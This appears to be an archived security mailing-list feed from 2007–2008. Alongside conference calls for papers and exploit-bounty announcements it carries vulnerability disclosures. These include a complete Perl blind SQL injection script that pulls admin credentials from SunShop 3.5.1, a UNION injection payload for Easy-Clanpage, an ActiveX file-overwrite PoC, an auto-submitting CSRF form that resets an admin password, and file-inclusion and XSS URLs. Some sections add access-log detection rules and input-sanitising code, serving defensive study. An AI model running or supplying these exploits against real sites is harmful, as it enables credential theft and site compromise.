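    clean = "' workflow as issued by the server\nSub Defects_Bug_New\nEnd Sub\n"
    tampered = clean + "' locally added code\n"
    reference = {}
    for project in ("proj_a", "proj_b"):
        folder = root / project
        folder.mkdir(parents=True)
        for name in WORKFLOW_FILES:
            (folder / name).write_text(clean)
            reference[f"{project}/{name}"] = hashlib.sha256(clean.encode()).hexdigest()
    bad = root / "proj_b" / "defects.tds"
    bad.write_text(tampered)
    os.chmod(bad, stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH)   # read-only
    return root, reference


def audit_cache(root, reference):
    """Flag cached .tds files that are read-only or differ from the server copy."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*.tds")):
        rel = path.relative_to(root).as_posix()
        # owner write bit cleared == the read-only trick the post describes
        read_only = not (path.stat().st_mode & stat.S_IWUSR)
        expected = reference.get(rel)
        modified = expected is not None and sha256_of(path) != expected
        if read_only or modified:
            findings.append({"path": rel, "read_only": read_only, "modified": modified})
    return findings


def run_demo():
    with tempfile.TemporaryDirectory() as tmp:
        root, reference = build_sample_cache(Path(tmp) / "TD_80")
        findings = audit_cache(root, reference)
        # restore write permission so the temporary tree can be removed everywhere
        for path in root.rglob("*.tds"):
            os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)
    return findings


if __name__ == "__main__":
    for finding in run_demo():
        print(finding)
```

On a real client the reference hashes would come from the server-side copies of the workflow scripts; since the post states that Quality Center rewrites these files on every connection, a read-only copy is already worth a look on its own.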


Hack.lu 2008 CfP

2008-05-16 Thread info

Call for Papers Hack.lu 2008

The purpose of the hack.lu convention is to give an open and free
playground where people can discuss the implication of new technologies
in society.

hack.lu is a balanced mix convention where technical and non-technical
people can meet each other and share freely all kinds of information.

The convention will be held in the Grand-Duchy of Luxembourg in October
2008 (22-24.10.2008).


Scope
=====

Topics of interest include, but are not limited to:

* Software Engineering and Security
* Honeypots/Honeynets
* Spyware, Phishing and Botnets (Distributed attacks)
* Newly discovered vulnerabilities in software and hardware
* Electronic/Digital Privacy
* Wireless Network and Security
* Attacks on Information Systems and/or Digital Information Storage
* Electronic Voting
* Free Software and Security
* Assessment of Computer, Electronic Devices and Information Systems
* Standards for Information Security
* Legal and Social Aspect of Information Security
* Software Engineering and Security
* Security in Information Retrieval
* Network security
* Forensics and Anti-Forensics
* Mobile communications security and vulnerabilities


Deadlines
=========

The following dates are important if you want to participate in the CfP

Abstract submission : no later than 1 July 2008
Full paper submission : no later than 1st August 2008
Notification date : around end of August


Submission guideline (for standard paper track)
===============================================

Authors should submit a paper in English up to 5.000 words, using a
non-proprietary and open electronic format.

The program committee will review all papers and the author of each
paper will be notified of the result, by electronic means.

Abstract is up to 400 words. Submissions must be sent via the
http://www.hack.lu/ website.

Submissions should also include the following:

1. Presenter, and geographical location (country of origin/passport) and
contact info.
2. Employer and/or affiliations.
3. Brief biography, list of publications or papers.
4. Any significant presentation and/or educational experience/background.
5. Reason why this material is innovative or significant or an important
tutorial.
6. Optionally, any samples of prepared material or outlines ready.
7. Whether or not the submission has already been presented, and where.

The information will be used only for the sole purpose of the hack.lu
convention including the information on the public website.

If you want to remain anonymous, you have the right to use a nickname.


(Accepted) Speakers' Privileges
===============================

* Accommodation will be provided (3 nights)
* Travel expenses will be covered
* Conference speakers night


Publication and rights
======================

Authors keep the full rights on their publication/papers but give an
unrestricted right to redistribute their papers for the hack.lu convention
and its related electronic/paper publication.


Sponsoring
==========

If you want to support the initiative and gain visibility by sponsoring,
please contact us by writing an e-mail to info(AT)hack.lu


Web site
========

http://www.hack.lu/


Barcamp and interactive session
===============================

During the conference, there is a continuous interactive session. You
are also very welcome to participate by submitting small ideas, a presentation
or a poster. The review process is simplified and open to anyone willing
to take an active role during the conference. You can submit your
proposal using the same web interface for the barcamp, but you are not
required to submit a full paper.

Submissions are done via the hack.lu website (http://www.hack.lu/)


The hack.lu conference is organized by the ASBL CSRRT-LU (Computer
Security Research and Response Team Luxembourg)


SunShop Version 3.5.1 Remote Blind Sql Injection

2008-05-15 Thread irvian . info
#!/usr/bin/perl -w

use LWP::UserAgent;

# scripts : SunShop Version 3.5.1 Remote Blind Sql Injection
# scripts site : http://www.turnkeywebtools.com/sunshop/
# Discovered
# By : irvian
# site : http://irvian.cn
# email : [EMAIL PROTECTED]

print "\r\n[+]-[+]\r\n";
print "[+]Blind SQL injection [+]\r\n";
print "[+]SunShop Version 3.5.1 [+]\r\n";
print "[+]code by irvian [+]\r\n";
print "[+]special : ifx, arioo, jipank, bluespy [+]\r\n";
print "[+]-[+]\n\r";

if (@ARGV < 5){
die "

Cara Mengunakan : perl $0 host option id tabel itemid

Keterangan
host : http://victim.com
Option : pilih 1 untuk mencari username dan pilih 2 untuk mencari password
id : Isi Angka Kolom id biasanya 1, 2 ,3 dst
tabel : Isi Kolom tabel biasanya admin atau ss_admin
itemid : Isi Angka valid (ada productnya) di belakang index.php?action=item&id=
Contoh : perl $0 http://www.underhills.com/cart 1 1 admin 10

\n";}

$url = $ARGV[0];
$option = $ARGV[1];
$id = $ARGV[2];
$tabel = $ARGV[3];
$itemid = $ARGV[4];

if ($option eq 1){
syswrite(STDOUT, "username: ", 10);}
elsif ($option eq 2){
syswrite(STDOUT, "password: ", 10);}

# one character position per outer iteration: digits/punctuation (ASCII 32-57)
# are tried first, then lower-case letters (97-122)
for($i = 1; $i <= 32; $i++){
$f = 0;
$n = 32;
while(!$f && $n <= 57)
{
if(blind($url, $option, $id, $tabel, $i, $n, $itemid)){
$f = 1;
syswrite(STDOUT, chr($n), 1);
}
$n++;
}
if ($f==0){
$n = 97;
while(!$f && $n <= 122)
{
if(blind($url, $option, $id, $tabel, $i, $n, $itemid)){
$f = 1;
syswrite(STDOUT, chr($n), 1);
}
$n++;
}
}
}
print "\n[+]finish Execution Exploit\n";

sub blind {
my $site = $_[0];
my $op = $_[1];
my $id = $_[2];
my $tbl = $_[3];
my $i = $_[4];
my $n = $_[5];
my $item = $_[6];
my $klm;

if ($op eq 1){
$klm = "username";
}
elsif ($op eq 2){
$klm = "password";
}
my $ua = LWP::UserAgent->new;
my $url = $site."/index.php?action=item&id=".$item."'%20AND%20SUBSTRING((SELECT%20".$klm."%20FROM%20".$tbl."%20WHERE%20id=".$id."),".$i.",1)=CHAR(".$n.")/*";
my $res = $ua->get($url);
my $browser = $res->content;
# the product page is shown only when the injected condition is true
if ($browser !~ /This product is currently not viewable/i){
return 1;
}
else {
return 0;
}
}
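
Both the LxBlog probe earlier in this digest (time-based, using sleep()) and the SunShop script above (boolean, one SUBSTRING/CHAR request per character) leave a distinctive trail in the web server's access log. The following Python is an added example, not part of either post, showing detection logic run over a few constructed Apache combined-format lines that imitate those request shapes: it URL-decodes each request target, matches a small set of SQL-injection indicators, and counts hits per client address, since the character-by-character loop in the SunShop script produces dozens of near-identical requests from one IP.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format lines (not taken from any real server).
# The first three imitate the request shapes described in the LxBlog and
# SunShop posts; the last two are ordinary traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [22/May/2009:10:01:02 +0000] "GET /user_index.php?action=tag&job=modify'
    '&type=blog%20k%20LEFT%20JOIN%20pw_user%20i%20ON%201=1%20WHERE%20i.uid=1%20AND%20'
    'if((ASCII(SUBSTRING(password,1,1))%3E0),sleep(10),1)/* HTTP/1.1" 200 5123',
    '10.0.0.9 - - [15/May/2008:11:20:41 +0000] "GET /cart/index.php?action=item&id=10'
    '%27%20AND%20SUBSTRING((SELECT%20password%20FROM%20admin%20WHERE%20id=1),1,1)=CHAR(97)/*'
    ' HTTP/1.1" 200 812',
    '10.0.0.9 - - [15/May/2008:11:20:42 +0000] "GET /cart/index.php?action=item&id=10'
    '%27%20AND%20SUBSTRING((SELECT%20password%20FROM%20admin%20WHERE%20id=1),1,1)=CHAR(98)/*'
    ' HTTP/1.1" 200 812',
    '10.0.0.7 - - [15/May/2008:11:21:00 +0000] "GET /cart/index.php?action=item&id=10 HTTP/1.1" 200 4410',
    '10.0.0.7 - - [15/May/2008:11:21:05 +0000] "GET /images/logo.png HTTP/1.1" 200 9102',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Each rule is matched against the URL-decoded, lower-cased request target.
RULES = {
    "time_based": re.compile(r"\bsleep\s*\(|\bbenchmark\s*\("),
    "char_extraction": re.compile(r"\b(substring|substr|mid|ascii|char)\s*\("),
    "union": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "comment_tail": re.compile(r"/\*|--\s|--$"),
    "tautology_join": re.compile(r"\bleft\s+join\b|\bon\s+1\s*=\s*1\b"),
}


def parse_line(line):
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify_target(target):
    """Return the names of every rule that fires on the decoded request target."""
    decoded = unquote_plus(target).lower()
    return [name for name, rx in RULES.items() if rx.search(decoded)]


def scan_access_log(lines):
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        rules = classify_target(rec["target"])
        if rules:
            hits.append({"ip": rec["ip"], "ts": rec["ts"],
                         "target": rec["target"], "rules": rules})
    return hits


def probes_per_ip(lines):
    """Count flagged requests per source; a blind-extraction loop stands out here."""
    counts = {}
    for hit in scan_access_log(lines):
        counts[hit["ip"]] = counts.get(hit["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit["ip"], hit["rules"])
    print(probes_per_ip(SAMPLE_LOG))
```

The rules are deliberately narrow; on a production log the per-IP count and the request rate matter more than any single match, because a legitimate query string can contain an isolated keyword but will not produce a run of near-identical requests that differ only in one CHAR() value.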


Zune software - arbitrary file overwrite

2008-04-23 Thread info
Vulnerability class : Arbitrary file overwrite
Discovery date : 21 April 2008
Remote : Yes
Credits : J. Bachmann & B. Mariani from ilion Research Labs
Vulnerable : Zune software: EncProfile2 Class


An arbitrary file overwrite has been discovered in an ActiveX control installed
with the Zune software package.

If a user visits the malicious page and authorizes the control to run (it is not
marked safe for scripting), the attacker can erase an arbitrary file.


POC:

<HTML>
<BODY>
<object id="ctrl" classid="clsid:{0B1C3B47-207F-4CEA-8F31-34E4DB2F6EFD}"></object>
<SCRIPT>
function Do_it()
 {
   File = "c:\\boot_.ini"
   ctrl.SaveToFile(File)
 }
</SCRIPT>
<input language="JavaScript" onclick="Do_it()" type="button" value="Proof of Concept">
</BODY>
</HTML>



Easy-Clanpage 2.2 (id) Remote SQL Injection Vulnerability

2008-03-20 Thread info
###################################################
##  Easy-Clanpage v2.2                           ##
##  SQL Injection Vulnerability                  ##
###################################################
#
# AUTHOR   : MadNet
# HOMEPAGE : http://www.Shadowturk.org/
# Mail     : MadNet[at]hackertr[dot]org
#
# Source : http://easy-clanpage.de/?section=downloads&show=viewdownload&id=14
# Dork   : Easy-Clanpage v2.2
#
# Vuln File : /inc/module/online.php
#
# EXPLOIT :
# http://www.[site].com/[path]/?section=user&action=details&id=
#
# EXAMPLE :
# -1/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7/**/from/**/ecp_user/**/where/**/userid=1/*
#
# www.ShadowTURK.Org
# Thanks : Str0ke and Milw0rm
###################################################



Digital Armaments March-April Hacking Challenge: 5,000$ Prize - Client Vulnerabilities and Exploit

2008-03-18 Thread info
Digital Armaments March-April Hacking Challenge: 5,000$ Prize - Client 
Vulnerabilities and Exploit


Publication is 03.15.2008

http://digitalarmaments.com//content/view/46/27/


I. Details


Digital Armaments officially announces the launch of the March-April hacking
challenge.

The challenge starts on March 1. For the March-April Challenge, Digital
Armaments will give a prize of 5,000$ for each submission that results in an
Exploitable Vulnerability or Working Exploit for Windows or Windows Diffuse
Application. This should include an example and documentation.


The submission must be sent during the March/April months and be received by 
midnight EST on April 30, 2008. The 5,000$ PRIZE will be an extra added to the 
normal vulnerability payment (check the DACP scheme).


 

II. References


For further information on the Digital Armaments Contributor Program (DACP) please
refer to the contribute section.

Details of credits value can be found at the contribute section and in the FAQs 
section.


 


III. Legal Notices


Copyright © 2008 Digital Armaments Inc.


Redistribution of this alert electronically is allowed. It should not be edited 
in any way. Reprint the whole is allowed, partial reprint is not permitted. For 
any other request please email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate at the 
time of publishing based on currently available information. Use of the 
information constitutes acceptance for use in an AS IS condition. There are no 
warranties with regard to this information. Neither the author nor the 
publisher accepts any liability for any direct, indirect, or consequential loss 
or damage arising from use of, or reliance on, this information. 


LiveCart XSS vulnerability fixed since version 1.1.0

2008-02-01 Thread info
This issue has been resolved since version 1.1.0:

http://livecart.com/news/Major-update-LiveCart-1-1-0.8


Digital Armaments January-February Hacking Challenge: Special 20.000$ Prize - Windows Vulnerabilities and Exploit

2008-01-10 Thread info
Digital Armaments January-February Hacking Challenge: Special 20.000$ Prize - 
Windows Vulnerabilities and Exploit


Challenge publication is 01.04.2008

http://www.digitalarmaments.com/challenge200801566321.html



I. Details


Digital Armaments officially announces the launch of the January-February hacking
challenge.


The challenge starts on January 1. For the January-February Challenge, Digital
Armaments will give a SPECIAL PRIZE of 20.000$ for each submission that results
in an Exploitable Vulnerability or Working Exploit for Windows or Windows
Diffuse Application. This should include an example and documentation.

The submission must be sent during the January/February months and be received 
by midnight EST on February 29, 2008. The 20.000$ PRIZE will be an extra added 
to the normal vulnerability payment (check the DACP scheme).


 


II. References


For further information on the Digital Armaments Contributor Program (DACP) please
refer to:


http://www.digitalarmaments.com/contribute.html


Details of credits value can be found at:


http://www.digitalarmaments.com/contribute.html#credit


 


III. Legal Notices


Copyright © 2008 Digital Armaments Inc.


Redistribution of this alert electronically is allowed. It should not be edited 
in any way. Reprint the whole is allowed, partial reprint is not permitted. For 
any other request please email [EMAIL PROTECTED] for permission. Disclaimer: 
The information in the advisory is believed to be accurate at the time of 
publishing based on currently available information. Use of the information 
constitutes acceptance for use in an AS IS condition. There are no warranties 
with regard to this information. Neither the author nor the publisher accepts 
any liability for any direct, indirect, or consequential loss or damage arising 
from use of, or reliance on, this information.



Digital Armaments November-December Hacking Challenge: Diffuse Client Application (10.000$ extra)

2007-11-29 Thread info
Digital Armaments November-December Hacking Challenge: Diffuse Client 
Application


Challenge Publication 11.29.2007

http://www.digitalarmaments.com/challenge200711849505.html



I. Details


Digital Armaments officially announces the launch of the November-December hacking
challenge.

The challenge starts on November 1. For the November-December Challenge, 
Digital Armaments will give 10.000$ and 5000 credits EXTRA for each submission 
that results in a Diffuse Client Application (example: Internet Explorer, 
Firefox, Safari, Microsoft Office, Winzip, Zip, MSN, Skype) Vulnerability. This 
should include example and documentation.


The submission must be sent during the November/December months and be received 
by midnight EST on December 31, 2007. The 10.000$ and 5000 credits will be an 
extra added to the normal vulnerability payment (check the DACP scheme).


 


II. References


For further information on the Digital Armaments Contributor Program (DACP) please
refer to:


http://www.digitalarmaments.com/contribute.html


Details of credits value can be found at:


http://www.digitalarmaments.com/contribute.html#credit


 


III. Legal Notices


Copyright © 2007 Digital Armaments Inc.


Redistribution of this alert electronically is allowed. It should not be edited 
in any way. Reprint the whole is allowed, partial reprint is not permitted. For 
any other request please email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate at the 
time of publishing based on currently available information. Use of the 
information constitutes acceptance for use in an AS IS condition. There are no 
warranties with regard to this information. Neither the author nor the 
publisher accepts any liability for any direct, indirect, or consequential loss 
or damage arising from use of, or reliance on, this information.


VigileCMS 1.4 Multiple Remote Vulnerabilities

2007-11-19 Thread info
VigileCMS 1.4 Multiple Remote Vulnerabilities

---

---

   Author : DevilAuron (http://devilsnight.altervista.org)

   Vendor : VigileCMS 1.4
   Date   : [16-11-2007] (dd-mm-yyyy)


Permanent Xss:
---
http://[site]/[path]/index.php?module=vedipm&inviapm=true
http://[site]/[path]/index.php?module=live_chat
Insert the xss in the message


Local File Inclusion:
---
http://[site]/[path]/index.php?module=[somefile]%00


CSRF:
---
<form name="cambia" method="post" action="http://127.0.0.1/VIGILE_1.4/index.php?module=changepass">
<input type="password" name="new1" maxlength="20" value="123456">
<input type="password" name="new2" maxlength="20" value="123456">
<input type="hidden" name="pw" value="Cambia la Password">
</form>
<script>document.cambia.submit()</script>
<!-- This changes the Admin password -->


---



new vuln in snewscms.net.ru in lang file

2007-10-08 Thread info
New Advisory:

 Snewscms Rus

 http://www.medconsultation.ru


Summary

 Software: SnewsCMS Rus v. 2.1

 Software's Web Site: http://www.snewscms.net.ru

 Versions: 2.1

 Critical Level: Moderate

 Type: XSS

 Class: Remote

 Status: Unpatched

 PoC/Exploit: Not Available

 Solution: Not Available

 Discovered by: http://medconsultation.ru


-Description---

 1. XSS.


Vulnerable script: news_page.php


Parameter 'page_id' is not properly sanitized before being used in HTML tags.
http://target.com/news_page.php?page_id=<h1>XSS</h1>


--PoC/Exploit--

 Waiting for developer(s) reply.


--Solution-

 No Patch available.


--Credit---

 Discovered by: http://www.medconsultation.ru


hack.lu 2007 18-20 October, Luxembourg

2007-09-07 Thread info
Dear Information Security Freaks,

This is to announce that the line-up of the speakers and their subjects
is finally up in a draft version on hack.lu 2007 (http://www.hack.lu/).

Have a look and register as space is limited and prices go up progressively.

We managed again to have speakers from all over the world
coming to Luxembourg, the small country in Europe. There is a large
diversity of interesting topics covered during the three days of this
intimate security conference.

This year we will also have a Capture The Flag contest organized by the
Kenshoto group running from the beginning of the conference.  If you
want to test your skills, it's now or never.

There is also a Hack/Barcamp on the first day where we can have
a participatory workshop-event in an open atmosphere with no
limits or boundaries on the information security aspects.

We really hope to see you there.

Your hack.lu team



Digital Armaments 2007 September-October Hacking Challenge: Symbian

2007-09-04 Thread info
Digital Armaments September-October Hacking Challenge: Symbian

Challenge publication 09.04.2007
http://www.digitalarmaments.com/challenge200709362386.html


I. Details

Digital Armaments officially announces the launch of the September-October hacking
challenge.

The challenge starts on September 1. For the September-October Challenge, 
Digital Armaments will give 5000 credits EXTRA for each submission that results 
in a Symbian Vulnerability. This should include example and documentation. The 
submission must be sent during the September/October months and be received by 
midnight EST on October 31, 2007. The 5000 credits will be an extra added to 
the normal vulnerability payment (check the DACP scheme).

 

II. References 

For further information on the Digital Armaments Contributor Program (DACP) please
refer to:

http://www.digitalarmaments.com/contribute.html

Details of credits value can be found at:

http://www.digitalarmaments.com/contribute.html#credit

 

III. Legal Notices

Copyright © 2007 Digital Armaments Inc. 

Redistribution of this alert electronically is allowed. It should not be edited 
in any way. Reprint the whole is allowed, partial reprint is not permitted. For 
any other request please email [EMAIL PROTECTED] for permission. Disclaimer: 
The information in the advisory is believed to be accurate at the time of 
publishing based on currently available information. Use of the information 
constitutes acceptance for use in an AS IS condition. There are no warranties 
with regard to this information. Neither the author nor the publisher accepts 
any liability for any direct, indirect, or consequential loss or damage arising 
from use of, or reliance on, this information. 


Re: InterWorx-CP Multiple HTML Injections Vulnerabilitie

2007-08-29 Thread info
InterWorx 3.0.3 has been released that addresses this problem.

http://interworx.com/forums/showthread.php?t=2501


Re: Menu Manager Mod for WebAPP - No Input Filtering

2007-07-14 Thread info
The issue is not yet secure at http://www.web-app.org 

1.) Guests can edit files on the server by:
http://victim-domain/cgi-bin/index.cgi?action=menu
- There are approximately 35 webapporg sites of version 0.9.9.7 defaced with 
the issue. So it couldn't possibly be fixed for 0.9.9.7 as claimed above.

2.) Members/guests can add $values in the menu form. Allowing $ is madness; it
can be exploited to run direct cmd on the Perl shell.

I tried posting a message about it before here but  it was unnoticed and never 
published.

Kind regards
On Elpeleg
WebAPP





Re: LuckyBot v3 Remote File Include

2007-06-07 Thread info
This won't work unless register_globals is on, and almost every webhost
with PHP5 does not have register_globals on.

So what a stupid exploit.


Re: UPDATED: CubeCart (v3.0.15) - CRLF Injection Vulnerability

2007-05-09 Thread info
3.0.16 will be released later today. Simple str_replace to fix in 
includes/session.inc.php and treatGet function on $_GET['ccUser']. 

## remove possible CRLF injection
$sessId = str_replace(array('%0d', '%0a'), '', $sessId);

Please report any potential security issues directly to us in the future rather 
than making them public immediately.
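
The one-line str_replace quoted above removes the URL-encoded forms of CR and LF. Whether a value still contains those encoded sequences, or the raw characters instead, depends on the stage at which the replacement runs: PHP has already URL-decoded $_GET by the time a script reads it. The Python below is an added example, not CubeCart code, that puts the encoded-only strip next to a decode-then-strip variant and, preferably, an allow-list check that rejects any session id not made of plain alphanumerics. The ccUser name comes from the post; everything else is constructed.

```python
import re
from urllib.parse import unquote

# The published one-liner (quoted in the post) removes the URL-encoded forms.
ENCODED_CRLF = re.compile(r"%0[dD]|%0[aA]")


def strip_encoded_crlf(value):
    """Port of the fix quoted above: drop '%0d' and '%0a' sequences only."""
    return ENCODED_CRLF.sub("", value)


def strip_raw_crlf(value):
    """Drop every raw CR/LF and NUL, whatever encoding the value arrived in.

    Decoding first means one %-encoded layer cannot slip past the check.
    """
    return re.sub(r"[\r\n\x00]", "", unquote(value))


# Allow-list: a session id never legitimately needs anything but [A-Za-z0-9].
SESSION_ID_RE = re.compile(r"^[A-Za-z0-9]{1,64}$")


def is_valid_session_id(value):
    return bool(SESSION_ID_RE.match(value))


def set_cookie_header(name, value):
    """Build a Set-Cookie line, refusing anything that could end the header early."""
    if not is_valid_session_id(value):
        raise ValueError("session id rejected")
    return f"Set-Cookie: {name}={value}; HttpOnly"


def safe_to_emit(name, value):
    """True when set_cookie_header would accept the value."""
    try:
        set_cookie_header(name, value)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    raw = "abc\r\nSet-Cookie:evil=1"
    print(repr(strip_encoded_crlf(raw)), repr(strip_raw_crlf(raw)))
    print(safe_to_emit("ccUser", "a1b2c3d4"), safe_to_emit("ccUser", raw))
```

Rejecting rather than stripping is the safer default: a stripped value silently turns one injected string into another, whereas a rejected request is also a log line worth alerting on.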


Digital Armaments May-June-2007 Hacking Challenge: VMware

2007-05-09 Thread info
Digital Armaments May-June Hacking Challenge: VMware

Challenge Publication is 09.05.2007
http://www.digitalarmaments.com/challanges_open.html

I. Details

Digital Armaments officially announces the launch of the May-June hacking challenge.

The challenge starts on May 1. For the May-June Challenge, Digital Armaments 
will give 5000 credits EXTRA plus 2500$ EXTRA for each submission that results 
in a VMware High Risk Vulnerability. This should include example and 
documentation. 

The submission must be sent during the May/June months and be received by 
midnight EST on June 30, 2007. The 5000 credits plus the 2500$ will be an extra 
added to the normal vulnerability payment (check the DACP scheme).

 

II. References 

For further information on the Digital Armaments Contributor Program (DACP) please
refer to:

http://www.digitalarmaments.com/contribute.html

Details of credits value can be found at:

http://www.digitalarmaments.com/contribute.html#credit

 

III. Legal Notices

Copyright © 2007 Digital Armaments Inc. 

Redistribution of this alert electronically is allowed. It should not be edited 
in any way. Reprint the whole is allowed, partial reprint is not permitted. For 
any other request please email [EMAIL PROTECTED] for permission. 

Disclaimer: The information in the advisory is believed to be accurate at the 
time of publishing based on currently available information. Use of the 
information constitutes acceptance for use in an AS IS condition. There are no 
warranties with regard to this information. Neither the author nor the 
publisher accepts any liability for any direct, indirect, or consequential loss 
or damage arising from use of, or reliance on, this information. 


Re: 12All File Upload Vulnerability

2007-05-07 Thread info
FCKEditor fixed in version 4.54.  User needed to be logged in as an ADMIN user 
to be able to use this vulnerability.


blogsystem 1.4 local remote = -rfi lfi -xss

2007-04-25 Thread info
demo: blog23.com
by: hackerz.ir userz!
ADMIN/index.php  include($category."/".$folder."_".$page.".php");
ADMIN/index.php  include($category."/".$action.".php");
ADMIN/login.php  include($lngTexts);
ADMIN/login.php  include($lngConfig);
BO/index.php     include($category."/".$folder."_".$page.".php");
BO/index.php     include($category."/".$action.".php");
BO/login.php     include($lngTexts);
BO/login.php     include($lngConfig);
for example, remote:
++
log in to your user; after that you can use the exploit 
ADMIN/index.php  include($category."/".$folder."_".$page.".php");
+
local file include & remote file include in admin panel
BO/login.php     include($lngTexts);
BO/login.php     include($lngConfig);


CfP Hack.lu 2007

2007-04-19 Thread info


Call for Papers Hack.lu 2007



The purpose of the hack.lu convention is to give an open and free
playground where people can discuss the implications of new technologies
in society.
hack.lu is a balanced-mix convention where technical and non-technical
people can meet each other and share freely all kinds of information.
The convention will be held in the Grand-Duchy of Luxembourg in October
2007 (18-20.10.2007).

Scope
==

Topics of interest include, but are not limited to:

  * Software Engineering and Security
  * Honeypots/Honeynets
  * Spyware, Phishing and Botnets (Distributed attacks)
  * Newly discovered vulnerabilities in software and hardware
  * Electronic/Digital Privacy
  * Wireless Network and Security
  * Attacks on Information Systems and/or Digital Information Storage
  * Electronic Voting
  * Free Software and Security
  * Assessment of Computer, Electronic Devices and Information Systems
  * Standards for Information Security
  * Legal and Social Aspect of Information Security
  * Software Engineering and Security
  * Security in Information Retrieval
  * Network security


Deadlines
=

The following dates are important if you want to participate in the CfP:

Abstract submission: no later than 1 June 2007

Full paper submission: no later than 15 July 2007

Notification date: around end of July / beginning of August


Submission guideline


Authors should submit a paper in English of up to 5,000 words, using a
non-proprietary and open electronic format.
The program committee will review all papers and the author of each
paper will be notified of the result by electronic means.
Abstracts are up to 400 words. Submissions must be sent to:
hack2007-paper(AT)hack.lu

Submissions should also include the following:

 1. Presenter, and geographical location (country of origin/passport) and
contact info.
 2. Employer and/or affiliations.
 3. Brief biography, list of publications or papers.
 4. Any significant presentation and/or educational experience/background.
 5. Reason why this material is innovative or significant or an
important tutorial.
 6. Optionally, any samples of prepared material or outlines ready.

The information will be used only for the sole purpose of the hack.lu
convention, including the information on the public website.
If you want to remain anonymous, you have the right to use a nickname.

Speakers' Privileges


* Accommodation will be provided (max 3 nights)
* Travel expenses will be covered
* Conference speakers night
* Speakers' goodies...

Program Committee
=

http://www.hack.lu/index.php/ProgramCommittee

Publication and rights
==

Authors keep the full rights on their publication/papers but give an
unrestricted right to redistribute their papers for the hack.lu convention
and its related electronic/paper publication.

Sponsoring
==

If you want to support the initiative and gain visibility by sponsoring,
please contact us by writing an e-mail to info(AT)hack.lu

Web site and wiki
=

http://www.hack.lu/


Re: bloofoxCMS 0.2.2 Remote File Include Vulnerabilitiy

2007-04-17 Thread info
The variable $content_php is set in PHP code and should overwrite any user-made 
inserts in the URL. I think this is not a vulnerability, is it?


Digital Armaments Security Advisory 20.01.2007: Grsecurity Kernel PaX Vulnerability

2007-01-20 Thread info
Digital Armaments advisory is 01.20.2007
http://www.digitalarmaments.com/2007200184936274.html

I. Background

grsecurity is an innovative approach to security utilizing a multi-layered 
detection, prevention, and containment model. It is licensed under the GPL.

For further information or detail about the software you can refer to the 
vendor's homepage:

http://www.grsecurity.net/


II. Problem Description

A vulnerability exists in expand_stack() of the grsecurity patch. This 
vulnerability allows local privilege escalation.


III. Details

The problem persists in the expand_stack() function:

[0]kdb b
Stack traceback for pid 29939
0xce9f6560 29939 16112 1 0 R 0xce9f6730 *bugpax
EBP EIP Function (args)
0xced1ed24 0xc0197e57 find_vma+0x27 (0xce5350e4, 0x5000, 0xced1ed60, 
0xce9f6560, 0x7b)
0xced1ed60 0xc01981aa expand_stack+0x13a (0xce9f6560, 0xcdcfc9c0, 0x0, 
0xcffcfaa0, 0x0)
0xced1ee3c 0xc0157829 do_page_fault+0x2b9 (0xce5350e4, 0x0, 0x0, 0xce535110, 
0xcdcfc6e8)
0xc014543b error_code+0x2b
Interrupt registers:

SS trap at 0xc0197e82 (find_vma+0x52)
0xc0197e82 find_vma+0x52: ret
[0]kdb
SS trap at 0xc01981aa (expand_stack+0x13a)
0xc01981aa expand_stack+0x13a: test %eax,%eax
[0]kdb r
eax = 0xcdcfc6e8 ebx = 0x ecx = 0xcdcfc6e8 edx = 0xcdcfc700
esi = 0xcdcfc9c0 edi = 0xcdcfc9c0 esp = 0xced1ed2c eip = 0xc01981aa
ebp = 0xced1ed60 xss = 0x0068 xcs = 0x0060 eflags = 0x0286
xds = 0x007b xes = 0x007b origeax = 0x regs = 0xced1ecf8
[0]kdb vm 0xcdcfc6e8
struct vm_area_struct at 0xcdcfc6e8 for 92 bytes
vm_start = 0x5000 vm_end = 0x60004000
vm_page_prot = 0x25
vm_flags: READ WRITE EXEC MAYREAD MAYWRITE MAYEXEC GROWSDOWN
[0]kdb

The bug generates a crash here:

Stack traceback for pid 31494
0xcea9d020 31494 4536 1 0 R 0xcea9d1f0 *bugpax
EBP EIP Function (args)
0xc4d70de4 0xc019923f exit_mmap+0x17f (0xce50634c, 0xce50634c, 0xce506378)
0xc4d70df8 0xc0160144 mmput+0x34 (0xce50634c, 0x2b, 0xc4d7, 0xcea9d020, 
0xcea9d4d8)
0xc4d70e14 0xc01647f4 exit_mm+0xb4 (0xcea9d020, 0x7, 0x6, 0x0, 0x1)
0xc4d70e40 0xc0165238 do_exit+0xb8 (0xc4d70ec0, 0x7, 0xc4d70f60, 0xc4d7)
0xc4d70e58 0xc016559c do_group_exit+0x3c (0x7, 0x7, 0xc4d70f60, 0xcf4d55a0, 
0xc4d7)
0xc4d70e84 0xc016efa6 get_signal_to_deliver+0x1f6 (0xc4d70ec0, 0xc4d70ea0, 
0xc4d70f60, 0x0, 0x5fbc)
0xc4d70f4c 0xc0144124 do_signal+0x74 (0x278aaff4)
0xc4d70f58 0xc01441fd do_notify_resume+0x3d
0xc01443de work_notifysig+0x13

Use the following proof code to trigger the vulnerability:

/*
** expand_stack() PaX local root vulnerability
** Vulnerability trigger.
**
** Copyright (C) 2007
** Digital Armaments Inc. - www.digitalarmaments.com
*/

#define _GNU_SOURCE
#include <unistd.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>     /* memset, memcpy */
#include <sched.h>
#include <fcntl.h>
#include <asm/page.h>   /* PAGE_SIZE */
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mman.h>
